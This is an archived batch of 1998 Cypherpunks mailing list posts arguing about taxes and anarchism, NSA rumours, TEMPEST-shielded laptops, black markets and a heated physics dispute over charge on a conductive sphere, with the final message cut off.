From: Petro <petro@playboy.com>
Date: Tue, 10 Nov 1998 07:58:40 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Advertising Creepiness
In-Reply-To: <199811091403.GAA27556@smtp.well.com>
Message-ID: <v0401170ab26d193c3028@[206.189.103.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 12:50 PM -0500 11/9/98, Tim May wrote:
>I'm glad I'm not a lawyer.

	Why, so you don't have to shoot yourself?
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Tue, 10 Nov 1998 09:58:20 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: How to solve the tax problem w/o anarchy or force (fwd)
Message-ID: <5F152E6E8E6FD21195DF00104B2425AD02B275@yarrowbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain




Vladimir Z. Nuri wrote:

> cpunks actually contribute to this problem with their nihilistic
> philosophy in general. the msg is that it is a waste of time
> to engage in group activity or political discourse or lobbying
> against the govt or organization or *whatever*... it's actually
> just a variant on the sheeple passivity.


"If you think of yourselves as helpless and ineffectual, it is 
certain that you will create a despotic government to be your 
master. The wise despot, therefore, maintains among his subjects 
a popular sense that they are helpless and ineffectual." 
                          --Frank Herbert, The Dosadi Experiment 


I don't think many cpunks (and other freedom loving people) are necessarily
nihilistic so much as they have come to the conclusion that to ignore and/or
subvert government has higher probability of success than trying to reform
it -- much to the demise of the Libertarian Party. The whole cryptography
and geodesic communications being the bane of the nation-state theme tends
to support this idea.

	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Tue, 10 Nov 1998 10:14:54 +0800
To: cypherpunks@cyberpass.net
Subject: Re:  IP: NSA Threatens To "OUT" Republicans Over Hubbell Investigation
Message-ID: <3647983F.6EBE@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



OOH:
Oh, I suppose so. Part of the Yet Another Conspiracy Conspiracy Theory.

OTOH:
1) The people who run NSA are powerful people in their own right. I
would be surprised if they could be easily made into a simple political
tool

2) If there is ONE country in the world that the US would like to set up
for another "Crypto-AG", another "Softwar"( ok early computer spy story
I read long ago ), which country might that be? And why might NSA not
want media attention? Could it be that someone spoke before thinking?
Ready, fire, aim. That's why I don't go into the woods during deer
season.

It would be damn nifty to be able to snoop ( and override ) the target
country's police and military communications networks and air traffic
systems wouldn't it? Now they're wise before we've got'em mainlining our
trash.

Mike

Newt Gingrich - There are some good people in the Republican party. Newt
is not one of them. Good riddance to bad rubbish. 

********
The seemingly crazy Clinton policy shows our President to be
crazy like a fox.  Clinton did what Pollard and Walker could not
do.  President Clinton sold national security secrets for cash
by writing his own legal waivers.  

Clinton's secret crypto policy served to line the pockets of
politicians and greedy corporate executives with red money.  The
Clinton export policy has significantly upgraded the nuclear
strategic and tactical firepower of the Chinese Army.  Clinton,
like Walker and Pollard, sold military code secrets for cash.

America knows more about AREA-51 and UFOs than Ft. Meade and
Webster Hubbell.  Bill Clinton and his China crypto-tale will
never be declassified for the American people.  The Clinton
scandal cover-up is backed by the NSA library of greatest
intercepts against Republicans.
*********




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 10 Nov 1998 10:19:25 +0800
To: Adam Back <aba@dcs.ex.ac.uk>
Subject: Re: How to solve the tax problem w/o anarchy or force
In-Reply-To: <199811092311.XAA06732@server.eternity.org>
Message-ID: <199811100157.RAA05844@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



the distinction between govt and business is sometimes an
arbitrary one. for example govt agencies typically contract
with private companies to perform govt services. a massive
example of this is the defense industry. what I would tend
to propose is a system where this is augmented and finetuned
to the point the govt become a very efficient sorting mechanism
for channeling money to businesses that are the most efficient.
a very interesting combination of the ideas of free market and
govt service.

AB, I disagree that people would opt out of virtually all govt
services. bzzzzzzzt. think of things like trash collection etc.
I do believe the vast majority of things the govt does would
tend to stay there even if people had a choice.

the big libertarian question is, as you raise it: should people
have to pay for things they don't want. well consider things like
roads, police or fire protection, or the court system. 
what if you don't pay, but then dial
911 anyway? or you dial 911 and they ask for your credit card
first? <g>   it really does seem to me like there is a legitimate
role for a certain amount of money to be collected for govt
service. imho it is far, far less than whatis being collected
today. if taxes were 5-10% people wouldn't give as much a damn
about the govt and how it worked. it's because taxes are so high
that people are screeching more. screeching but not acting, as
usual.

libertarians tend to be awfully realistic some times. who pays for
roads when everyone uses them? but I'm definitely into the basic
libertarian ideas.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harvey Rook (Exchange)" <hrook@exchange.microsoft.com>
Date: Tue, 10 Nov 1998 10:29:32 +0800
To: "'Matthew James Gering'" <cypherpunks@cyberpass.net>
Subject: RE: NSA Threatens To "OUT" Republicans Over Hubbell Investigation
Message-ID: <2FBF98FC7852CF11912A0000000000010D19AD5F@DINO>
MIME-Version: 1.0
Content-Type: text/plain



An advanced, nuclear hardened encryption device, is an encryption device
that will still work after a nuke has gone off in the vicinity. Nuclear
bombs emit EMP's which destroy sensitive electronics.

Harv.

> -----Original Message-----
> Uh, what in the hell is "advanced, nuclear hardened, 
> encryption technology"
> ?
> 
> 	Matt
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Tue, 10 Nov 1998 10:44:40 +0800
To: cypherpunks@cyberpass.net
Subject: Advanced Nuclear-Hardened Encryption Technology
Message-ID: <3647A470.17C7@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



> Uh, what in the hell is "advanced, nuclear hardened, encryption
> technology"?

advanced(1) - we fucked up so we have to classify it so nobody but us
boobs will know what boobs we are

advanced(2) - last year's obsolete model in a new suit to fit this
year's corruption conspiracy

advanced(3) - we wish we had this but we're going to hint that we do
anyway to keep'em guessing

nuclear-hardened(1) - bikini glass ( not applicable )

nuclear-hardened(2) - a pencil

encryption technology - a copy of Gideon's and some stationary from the
Beijing Hilton




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Blanc" <blancw@cnw.com>
Date: Tue, 10 Nov 1998 10:50:08 +0800
To: <cypherpunks@cyberpass.net>
Subject: RE: Advertising Creepiness
In-Reply-To: <199811090532.VAA01509@netcom13.netcom.com>
Message-ID: <000501be0c53$05cd1da0$618195cf@blanc>
MIME-Version: 1.0
Content-Type: text/plain



My comments on this:

Consider what advertising does:  it notifies potential users/consumers about
products and services which might be of use or pleasure to them.

Consider who a potential audience/market is:  people who might be interested in
availing themselves of these products/services if they but knew of their
existence.

Advertising  which is in keeping with the theme of the medium's message is not
quite so obnoxious:  for instance, when looking over a magazine like Cigar
Afficionado, which is about smoking and enjoying "the good life", I see ads for
cigar accessories and after-dinner liquors and places where a person can order a
glass of Corvoisier (sp) and light up in good company.  The ads are a logical
extension of what one expects to find in those pages, they allow the reader to
see where they might find and purchase the goods they are reading about and
indulge in their pleasure, and so are not a nuisance - in particular as their
presentation is aesthetically pleasing and in good taste.

I don't expect to find there advertisements from Nature's Pantry Health Foods or
an Orthopedic Hospital.   I can't think right now just what advertising would be
so pertinent to a news magazine in cyberspace, but I imagine the same principle
applies and would make ads less a mere distraction, less jarring to the
attention.

Marketers aren't logical, though, are they.  :

    : )


   ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Tue, 10 Nov 1998 03:08:28 +0800
To: cypherpunks@toad.com
Subject: Fwd: [ISN] Wang touts spy-proof portable
Message-ID: <199811091833.TAA14454@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



>X-Authentication-Warning: enigma.repsec.com: majordomo set sender to 
>owner-isn@repsec.com using -f
>Date: Sun, 8 Nov 1998 21:35:22 -0700 (MST)
>From: mea culpa <jericho@dimensional.com>
>To: InfoSec News <isn@repsec.com>
>Subject: [ISN] Wang touts spy-proof portable  
>X-NoSpam: Pursuant to US Code; Title 47; Chapter 5; Subchapter II; 227
>X-NoSpam: any and all nonsolicited commercial E-mail sent to this address
>X-NoSpam: is subject to a download and archival fee in the amount of $500 US.
>X-NoSpam: E-mailing to this address denotes acceptance of these terms.
>X-Copyright: This e-mail copyright 1998 by jericho@dimensional.com
>Sender: owner-isn@repsec.com
>Reply-To: mea culpa <jericho@dimensional.com>
>x-unsubscribe: echo "unsubscribe isn" | mail majordomo@repsec.com
>x-infosecnews: x-loop, procmail, etc
>
>
>Forwarded From: William Knowles <erehwon@kizmiaz.dis.org>
>
>[News.com] (11.8.98) Wang Global has introduced a new portable computer,
>but it's not going to be winning any svelteness contests. 
> 
>Wang's Tempest Mobile Workstation, 3 inches thick and weighting 14.5
>pounds, is designed for government officials who need spy-proof computers
>that don't leak any telltale signals to electronic eavesdroppers. 
>
>The boxes are designed to meet the U.S. government's "Tempest"
>specification, which requires a computer to release extremely low amounts
>of electromagnetic emissions that could reveal what information the
>computer is processing. 
> 
>To protect against such emissions, Tempest-compliant machines must be
>encased in a lot of metal. Wang's portable looks like a thick laptop, said
>Wang spokeswoman Loretta Day, "but it's really so heavy, you can't really
>call it a laptop"  --all that metal would make it quite a burden for your
>lap. 
>
>As an added bonus, all that metal shields the computer from the
>electromagnetic pulse (EMP) generated by an exploding nuclear bomb that
>wreaks havoc with anything electronic. 
>
>When it's running, the machine can withstand a shock of five Gs--that's
>five times the acceleration caused by the Earth's gravity. But when it's
>switched off, it can take a 60-G shock. 
>
>Aside from being spy-proof, the new Wang system has some features that are
>familiar to ordinary buyers: a 15.1-inch LCD screen, a 233-MHz or 266-MHz
>Pentium II processor, a CD-ROM drive, and your choice of a 4GB, 6GB, or
>8GB removable hard disk. 
> 
>Wang also makes Tempest-compliant desktop computers, printers, routers,
>switches, and servers. It's one of a handful of such companies that supply
>the equipment to the government. Day said the chief customers are the
>State Department and intelligence agencies. Wang also makes computer
>equipment that complies with the Zone standard, similar to but less
>stringent than the Tempest standard. 
> 
>Pricing on the Wang portable wasn't available, but a competitor's Tempest
>portable computer with more lesser features was listed at one government
>Web site as costing more than $10,000. 
>
>
>-o-
>Subscribe: mail majordomo@repsec.com with "subscribe isn".
>Today's ISN Sponsor: Repent Security Incorporated [www.repsec.com]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jan Dobrucki <s1180@qmail.pjwstk.waw.pl>
Date: Tue, 10 Nov 1998 03:27:33 +0800
To: cypherpunks@cyberpass.net
Subject: SR2201 Supercomputer
Message-ID: <36473A7F.E5BDC1F5@qmail.pjwstk.waw.pl>
MIME-Version: 1.0
Content-Type: text/plain



http://www.hitachi.co.jp/Prod/comp/hpc/eng/sr1.html
Is the link for more information, in english...
And I can't find a stupid computer and a printer in one place that
prints postscript so I still haven't been able to give in my
application for the account on this super computer...

JD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jan Dobrucki <s1180@qmail.pjwstk.waw.pl>
Date: Tue, 10 Nov 1998 03:31:08 +0800
To: cypherpunks@cyberpass.net
Subject: SR2201 Supercomputer
Message-ID: <36473AA1.4BB5F5B5@qmail.pjwstk.waw.pl>
MIME-Version: 1.0
Content-Type: text/plain



http://www.hitachi.co.jp/Prod/comp/hpc/eng/sr1.html
Is the link for more information, in english...
And I can't find a stupid computer and a printer in one place that
prints postscript so I still haven't been able to give in my
application for the account on this super computer...

JD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 10 Nov 1998 10:24:31 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the Foregone (fwd)
Message-ID: <199811100205.UAA14919@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 9 Nov 1998 15:27:14 -0500
> From: Petro <petro@playboy.com>
> Subject: Re: dbts: Privacy Fetishes, Perfect Competition, and the Foregone
>  (fwd)

> 	No, it's that facists & socialists like yourself think we should be
> happy letting you decide what our social responsibilities are.

Actualy, no. I'm perfectly happy to let you run around paying no taxes on
your income. The part you're not going to like is that I'm also not going to
let you reap one iota of benefit from those systems that are built and
developed by those of us who do pay taxes without a cost. And the cost will
be more than what the necessary taxes would have been. Hell, a free-market
capitalist shouldn't begrudge a tidy profit anyone under any situation.

> 	I am perfectly willing to pay for a police force. A police force
> that arrests ALLEGED rapists, treats them like human beings until found
> guilty and then deals with them as the law indicates. I am NOT willing to
> pay for a police force that spends most of it's time (well, aside from
> eating doughnuts, drinking coffee and collecting bribes) chasing after
> teenagers with illegal chemicals. I am not willing to pay for a police
> force that extorts money from these same teenagers. I am not willing to pay
> money for a police force that thinks it needs to arrest people for
> "loitering", "Mob Action", when it's defined as more than 4 people standing
> together in a public place, and ESPECIALLY when EVERY TIME THEY ARREST
> SOMEONE, IT'S THROWN OUT OF COURT.

Neither am I, unfortunately paying taxes or not won't resolve those sorts of
issues. What is required is public over-watch groups (as was recently
implimented in Austin, pisses the cops off big time) and a change in the way
we run our prisons. As to the way people are currently treated prior to
being found guilty at a trial is an abuse of power on the part of those
parties involved and clearly cruel and unusual punishment for an innocent
man.

Of course the *REAL* problem isn't the police. It's the people who make the
laws that the police are sworn to uphold and the judges with a social agenda
(that is not relevant to their job however much they may squeel like pigs).
That process *is* most certainly an ideal place to inject consideration and
respect for civil liberties and the purvue of government institutions.

> 	I am willing to pay for the streets I use. I am not willing to pay
> the same fees to ride my bicycle (my current primary form of
> transportation) as you do to drive your 2 ton SUV.

And you probably don't now (Does a Bronco II weigh 2 tons?). In actuality
you don't pay the gas taxes, the vehicle registration, license fees,
inspection, requisite insurance, etc. for your bicycle. I bet you don't even
have to license your bike to ride it on the city streets.
 
> 	I am willing to pay for fire protection. I am not willing to pay
> for "universal health care", "welfare", and other such nonsense.

The Constitution happens to mention that the federal government is detailed
with taking care of the general welfare. If you don't like that sort of stuff
then get a Constitutional amendment passed.

> 	In other words Jim, Fuck You. I, and I'd bet most people here,
> including Mr. May, are perfectly willing, and hell even eager to pay their
> share, to assume their social responcibility, they just get very, very
> angry at having to pay OTHER peoples social responcibility, and get very,

Unfortunately, that is what social responsibility is - giving with in
personal gain. That ultimately is what drives the bee up your butt.

> very angry at having to pay for other shit (Senate Luncheons and Swimming
> Pools, the Militaries greatly inflated budget, all the waste that is todays
> federal government).

Agreed. Throwing the Constitution away won't fix that and going to a
free-market monopolistic no-social-responsibility-at-all system such as
anarcho-capitalism is sure won't do it.

> 	Yes, but a state can kill those who don't wish to be governed. Can
> and does routinely.

Oh what hyperbole. You make it sound like the Nazi's have invaded. They
haven't. Yes, there are misguided people out there. Yes, there are just
plain old corrupt people out there. That won't change irrespective of the
political system (or lack of one). They don't just go out and pick people
off the street and shoot them you're over-reacting and succumbing to a
paranoid delusion of persecution.

Unless you kill somebody or move a few tons of coke your individual chances
of being killed by the state is less than being struck by lightening.

> 	But did you bother to read them this time?

Actualy I read it twice before I even decide if I'm going to reply.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 10 Nov 1998 10:26:22 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: How to solve the tax problem w/o anarchy or force (fwd)
Message-ID: <199811100210.UAA15017@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Matthew James Gering <mgering@ecosystems.net>
> Subject: RE: How to solve the tax problem w/o anarchy or force (fwd) 
> Date: Mon, 9 Nov 1998 17:25:45 -0800 

> I don't think many cpunks (and other freedom loving people) are necessarily
> nihilistic so much as they have come to the conclusion that to ignore and/or
> subvert government has higher probability of success than trying to reform
> it -- much to the demise of the Libertarian Party.

There is certainly little historical evidence to support such a thesis.

> The whole cryptography
> and geodesic communications being the bane of the nation-state theme tends
> to support this idea.

Cryptography is the bane of anyone who wants to listen in, it's not just
nation-states that get hit with it. As to geodesic communications, it's been
around a lot longer than the Internet and nation states are still here.



    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jan Dobrucki <s1180@qmail.pjwstk.waw.pl>
Date: Tue, 10 Nov 1998 03:55:37 +0800
To: cypherpunks@cyberpass.net
Subject: SR2201 Supercomputer
Message-ID: <36473F38.5D764835@qmail.pjwstk.waw.pl>
MIME-Version: 1.0
Content-Type: text/plain



http://www.hitachi.co.jp/Prod/comp/hpc/eng/sr1.html
Is the link for more information, in english...
And I can't find a stupid computer and a printer in one place that
prints postscript so I still haven't been able to give in my
application for the account on this super computer...

JD




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 10 Nov 1998 10:39:41 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: charity at the point of a gun (Re: dbts: Privacy Fetishes, Perfect Competition, and the Foregone) (fwd)
Message-ID: <199811100216.UAA15081@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 10 Nov 1998 00:27:50 GMT
> From: Adam Back <aba@dcs.ex.ac.uk>
> Subject: charity at the point of a gun (Re: dbts: Privacy Fetishes, Perfect Competition, and the Foregone)
>  (fwd)

> What people aren't willing to pay for shouldn't happen.  Period. If
> that means people starve well those complaining loudest had better
> dig deeper into their pockets.

This attitude is exactly why such system as anarchy won't ever work.

> _Then_ Jim's "No state can govern those
> who don't wish to be governed" starts to become true.

It's true as much now as it was at the height of the American or French
Revolution.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 10 Nov 1998 10:39:43 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: Grounding (last slice of spam?) (fwd)
Message-ID: <199811100220.UAA15144@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 09 Nov 1998 16:19:48 -0800
> From: Michael Motyka <mmotyka@lsil.com>
> Subject: Re: Grounding (last slice of spam?)

> Sorry for prolonging the agony - I was hoping, in vain, for an admission
> of guilt.

Ok, your guilty.

> > Now the electrons repel each other and therefor move in a
> > circular motion with the spark gap as the center.
> > ^^^^^^^^^^^^^^^
> takes me on a trip with Mr. Peabody and Sherman to the place where the
> Huskies go...

Perhaps, but it doesn't change the fact that a cloud of like-charged
particles expand in a cloud of equi-radius (which when looked at in side
view is circular).


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 10 Nov 1998 10:53:59 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: Forwarded mail...
Message-ID: <199811100232.UAA15314@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: 9 Nov 1998 20:40:03 -0000
> From: lcs Mixmaster Remailer <mix@anon.lcs.mit.edu>
> Subject: Re: Grounding (fwd)

> Listen to this.  Jim Dolt thinks that a spark gap inside a conductive sphere
> will cause charge to build up on the surface of the sphere!  The dunderhead
> has forgotten about conservation of charge!

No, I didn't. First off your assumption that the charge in the battery is
neutral is faulty. No such point was ever made. I also mentioned this fact
when I brought up the Van DeGraff.

> Gauss' law says that the charge on the outer surface of a closed
> conductive sphere will be equal to the net charge inside the sphere.

Actualy, no it doesn't. What Gauss' Law does state is that if there is a
neutral ball and there is a point charge within it there will be a contrary
but equal charge imposed on the inside surface of the globe. As a result of
charge conservation there must be a equal and opposite (hence negative)
charge that is equal to the point charge inside the globe on the outside of
the globe.

> The spark gap can't change the net charge inside the sphere, it can just
> move charge around.  Jim Dolt has conveniently forgotten about the net
> positive charge which will build up on the spark gap as it (supposedly)
> emits electrons.

And the anonymous person has forgotten that we never defined the mechanism
of how the battery worked. It might very well have started out with a
net-negative charge. I didn't invent the model, just simply worked within
it. I also, on two seperate occassions, mentioned that I was not going to
deal with the net charge that gets deposited on the globe because of the
complexity it adds to the model.

> His Doltish notion that electrons will hit the inside of the sphere
> and "tunnel through" to the outside is totally confused.  Suppose this
> happened.  We've removed negative charges from the interior of the sphere
> and put them on the outside, where they would give the sphere a negative
> charge.  Now, what is the net charge on the interior of the sphere?
> We started neutral and removed negatives, hence it's positive!  Gauss'
> law would imply that the sphere must have a positive charge.

No, Gauss Law says at all times the charge on the sphere must stay equal for
point charges. Since the spark gap is by defintion emitting electrons it
doesn't qualify as a point charge. I brought this up as well in reference to
the Van DeGraff. Gauss's Law does say that any excess charge on the inside
of the globe will propogate to the outside of the globe.

Now each of those free electrons IS a point charge. You follow Gauss's Law
through the same process and what do you get....a charge equal to the
electron on the outside of the surface.

> The whole idea is ludicrous.  No charge can spontaneously appear on
> the outside of an ideal closed conductive sphere.  This would be a
> violation of the law of conservation of charge.

No, it wouldn't. The charge inside the sphere is exactly canceled by the
charge induced on the inside of the sphere (+ + - = 0) by Gauss's Law. Now
since the sphere is neutral, and we've induced that positive charge there
must be a balancing negative charge. That charge rests on the other
(outside) surface of the sphere. All that's taken place is that the universe
has created a situation where you can't steal charge and hide it where it
can't be found.

That WOULD violate conservation of charge.


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lcs Mixmaster Remailer <mix@anon.lcs.mit.edu>
Date: Tue, 10 Nov 1998 05:20:38 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Grounding (fwd)
Message-ID: <19981109204003.20193.qmail@nym.alias.net>
MIME-Version: 1.0
Content-Type: text/plain



Jim Dolt writes:

> The spark gap generates sparks and that builds up free electrons in the
> space inside the sphere (whether it is gas filled or a vacuum is
> irrelevant). As that charge builds up it will be all of one type, electrons.
> Now the electrons repel each other and therefor move in a circular motion
> with the spark gap as the center. They strike the surface of the sphere and
> tunnel through to the outside surface where they reside. The amount of
> charge at any one point is related to the curvature of the surface at that
> point. Since a sphere is constant curvature the charge will be evenly
> distributed. It will continue to build up so long as you supply power to the
> spark gap. In an ideal world it will get bigger and bigger. In the real
> world at some point insulation breaks down and normal current flow takes
> place.

Listen to this.  Jim Dolt thinks that a spark gap inside a conductive sphere
will cause charge to build up on the surface of the sphere!  The dunderhead
has forgotten about conservation of charge!

Gauss' law says that the charge on the outer surface of a closed
conductive sphere will be equal to the net charge inside the sphere.
The spark gap can't change the net charge inside the sphere, it can just
move charge around.  Jim Dolt has conveniently forgotten about the net
positive charge which will build up on the spark gap as it (supposedly)
emits electrons.

His Doltish notion that electrons will hit the inside of the sphere
and "tunnel through" to the outside is totally confused.  Suppose this
happened.  We've removed negative charges from the interior of the sphere
and put them on the outside, where they would give the sphere a negative
charge.  Now, what is the net charge on the interior of the sphere?
We started neutral and removed negatives, hence it's positive!  Gauss'
law would imply that the sphere must have a positive charge.  But Jim
Dolt tried to give it a negative charge from all those electrons that
"tunneled through."

The whole idea is ludicrous.  No charge can spontaneously appear on
the outside of an ideal closed conductive sphere.  This would be a
violation of the law of conservation of charge.  By Gauss' law, the
charge on the outside is equal to the net charge on the inside.  If a
sphere, just sitting there in empty space, suddenly develops a charge,
then that means that the interior has manufactured charge out of nothing.
It is impossible.

The fundamental misconception that started this whole sad comedy of
Doltish errors was Jim Dolt's belief that a Faraday cage has to be
grounded in order to suppress electromagnetic radiation.  This has led us
to his revelation of his further misunderstandings of how charge behaves
inside a conductive surface, not to mention his numerous errors about
the mechanism by which a spark gap transmitter generates EM radiation.
(Hint: it has nothing to do with a cloud of electrons spreading out from
the spark gap!)

The fact is, Jim Choate knows nothing about this topic, and the same is
true for most subjects that he writes about.  He loves the attention
he gets, but if more people told him they knew how worthless his
contributions are, he just might go bother someone else.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 10 Nov 1998 11:13:33 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone (fwd)
Message-ID: <199811100252.UAA15446@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Mon, 9 Nov 1998 13:23:20 -0500
> From: Petro <petro@playboy.com>
> Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone
>  (fwd)

> 	Usualy !=3D Correctly.
> 
> 	Take tomatoes. Perfectly legal (AFAIK) everywhere, here in this
> country a 5 year old child can buy a tomato from a farmer with a stand on
> the side of the road.
> 
> 	If you go back 10 years, and if "this country" was the soviet
> union, a tomato purchased from the wrong person could get you in trouble.

So what are saying...that because any government ever happened to abuse its
citizens in a particular way is justification to do away with all
government?

This is a strawman.

> 	This is true in this coutry. Licquor is legal if purchased thru the
> approved store.
> 
> 	Try selling the same thing out of the back of your truck.
> 
> 	It is the product, or how the product is sold.

Well actualy it's whether it has a tax stamp whether you sell it out of a
storefront or a truckbed is irrelevent. Considering the number of people who
died in the late 1800's and early 1900's because of moonshine liquor from
contaminated stills that were unregulated (where were those fine upstanding
ethical considerate eco-anarchists then?) it's probably a good thing that
it's illegal to sell untaxed and therefore anonymous alcohol.

> 	So take ampthetimines (well, don't take them, but take the case of
> them), if I get them from Joe Random Drug Dealer, it's black Market, if I
> get them from Paul the Doctor, it's "white" market.

Not necessarily. The doctor has to have a medicaly supportable reason to
dispence those drugs. Otherwise it's just as black market as Joe's.

> 	In fact, if I get them from Paul the Doctor, and then sell them to
> someone else, I am selling them on the black market, even if I recieved
> them legally, so in this case, it isn't how the item was aquired, it's
> whether the _sale_, the *exchange* is legal.

So, we've already established this as a viable mechanism. Rehash old hash.

> 	I didn't think of theft when I wrote the above, and I don't usually

Didn't think of theft? Jesus H. Christ, you gotta be on Joe's drugs. The
vast majority of material sold on *ANY* black market is stolen from its
rightful owner. It is *the* example of black market trading that most folks
think of first.

> 	I still maintain that as one moves closer to a completely free
> market, there is less and less of a black market, and to be the extrememe
> case of a free market, there would be the potential to trade in both human
> lives, and in stolen property.

Well, at least you're an honest eco-anarchist. And how do you propose to stop
this sort of behaviour (it's clear that there is a market whether the
economy is free-market or not) without some sort of 3rd party arbiter (call
it government or not is irrelevant to the point)?

> In a free market, the selling of stolen
> goods might not be a crime in and of itself, but the posession of those
> things could be,

How the hell do you sell something on the black market if you don't have
possession of it? And exactly who is going to prosecute anyone for
possession? Since we've done away with laws governing economics and trade
there isn't even a court to try the perps in if we did apprehend them
ourselves.

 and the aquireing would be, as well, the _hiring_ of an
> assassin might be legal, as long as no killing took place. When it does,
> you hang the assassin on murder, and the hirer on conspiracy, aiding and
> abetting or whatever, and stick them in the same cell.

Huh? Who is doing all this arresting and writing of laws, and building
jails, and staffing prisons, or hiring hangmen?

We're not in Kansas anymore toto....


    ____________________________________________________________________
 
            Lawyers ask the wrong questions when they don't want
            the right answers.

                                        Scully (X-Files)

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Tue, 10 Nov 1998 11:10:20 +0800
To: cypherpunks@einstein.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: How to solve the tax problem w/o anarchy or force (fwd)
Message-ID: <199811100254.UAA15502@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: "Blanc" <blancw@cnw.com>
> Subject: RE: How to solve the tax problem w/o anarchy or force (fwd)
